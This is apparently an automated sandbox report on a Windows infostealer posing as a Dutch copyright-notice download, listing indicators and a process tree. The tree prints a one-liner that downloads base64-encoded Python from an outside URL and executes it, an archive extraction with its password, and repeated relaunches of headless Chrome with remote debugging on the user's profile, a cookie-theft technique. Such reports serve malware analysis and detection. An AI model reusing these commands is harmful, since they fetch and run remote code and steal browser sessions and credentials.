1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe
1940	taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2912	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
2912	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
2912	De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4976 wrote to memory of 924	4976	chrome.exe	81
PID 4976 wrote to memory of 924	4976	chrome.exe	81
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3692	4976	chrome.exe	82
PID 4976 wrote to memory of 3628	4976	chrome.exe	83
PID 4976 wrote to memory of 3628	4976	chrome.exe	83
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84
PID 4976 wrote to memory of 3240	4976	chrome.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\fd42e30a-cb43-44b6-b3d3-8f1ac4c98221.htm
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
  2⤵
  PID:924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2040,i,5749962687733212482,14953448509114652910,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2028 /prefetch:2
  2⤵
  PID:3692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1916,i,5749962687733212482,14953448509114652910,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2076 /prefetch:3
  2⤵
  PID:3628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1808,i,5749962687733212482,14953448509114652910,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2280 /prefetch:8
  2⤵
  PID:3240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,5749962687733212482,14953448509114652910,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3148 /prefetch:1
  2⤵
  PID:5048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,5749962687733212482,14953448509114652910,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:4432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4364,i,5749962687733212482,14953448509114652910,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4608 /prefetch:8
  2⤵
  PID:3636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,5749962687733212482,14953448509114652910,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4848 /prefetch:1
  2⤵
  PID:2576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4928,i,5749962687733212482,14953448509114652910,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4944 /prefetch:8
  2⤵
  PID:4176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4808,i,5749962687733212482,14953448509114652910,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4036 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2880

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1376

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4520

C:\Users\Admin\AppData\Local\Temp\088d60c2-3152-481e-9156-bc9c3d5af487_De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.zip.487\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
"C:\Users\Admin\AppData\Local\Temp\088d60c2-3152-481e-9156-bc9c3d5af487_De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.zip.487\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe"
1⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2912

C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe
"C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\images\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur.bat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2280
- - C:\Users\Admin\Downloads\De video en afbeeldingen zijn auteursrechtelijk beschermd door de auteur\images\Rar.exe
    Rar x -pC2PINduHvfu86NQXni -inul -y QkCIiJe4GE3FJLfTqe.rar C:\Users\Public\R8D4YmtQLNucXFlnq3
    3⤵
    PID:1056
- - C:\Users\Public\R8D4YmtQLNucXFlnq3\synaptics.exe
    "C:\Users\Public\R8D4YmtQLNucXFlnq3\synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/insurify-html-v1.1/documentation/assets/img/glyphicons/Server_VIP/Adonis/Adonis_ALL').text))"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:6132
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5860
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:4420
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x228,0x22c,0x230,0x44,0x234,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:5884
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1504,i,100198270377795119,13850591897985845046,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1492 /prefetch:2
        5⤵
        
        PID:2436
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1768,i,100198270377795119,13850591897985845046,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1764 /prefetch:3
        5⤵
        
        PID:5324
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5780
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:4472
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:2980
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1496,i,17808098817354029558,13720579696572708059,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1488 /prefetch:2
        5⤵
        
        PID:4380
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1520,i,17808098817354029558,13720579696572708059,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1512 /prefetch:3
        5⤵
        
        PID:4364
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:2544
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:3340
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:3144
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1528,i,11979022789366370803,5914312145687410486,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1520 /prefetch:2
        5⤵
        
        PID:5956
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1800,i,11979022789366370803,5914312145687410486,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1796 /prefetch:3
        5⤵
        
        PID:4676
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5884
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:396
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:5524
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1480,i,2672310544477347483,2692769219337800439,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1472 /prefetch:2
        5⤵
        
        PID:5252
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1776,i,2672310544477347483,2692769219337800439,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1772 /prefetch:3
        5⤵
        
        PID:5336
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:3644
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:4132
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:6120
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1536,i,12317222935702336639,17415630551405075058,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1528 /prefetch:2
        5⤵
        
        PID:4336
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1776,i,12317222935702336639,17415630551405075058,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1772 /prefetch:3
        5⤵
        
        PID:1816
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:5780
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:5836
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x1cc,0x230,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:1068
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --log-level=3 --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --log-level=3 --field-trial-handle=1488,i,1615879476113889369,5593501412691628248,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1480 /prefetch:2
        5⤵
        
        PID:3312
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-level=3 --use-angle=swiftshader-webgl --use-gl=angle --headless --log-level=3 --field-trial-handle=1796,i,1615879476113889369,5593501412691628248,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:3
        5⤵
        
        PID:908
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:3996
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory=Default "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-allow-origins=* --disable-gpu --headless --no-sandbox --log-level=3
      4⤵
      Uses browser remote debugging
      PID:5188
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ffc56d6cc40,0x7ffc56d6cc4c,0x7ffc56d6cc58
        5⤵
        
        PID:4124
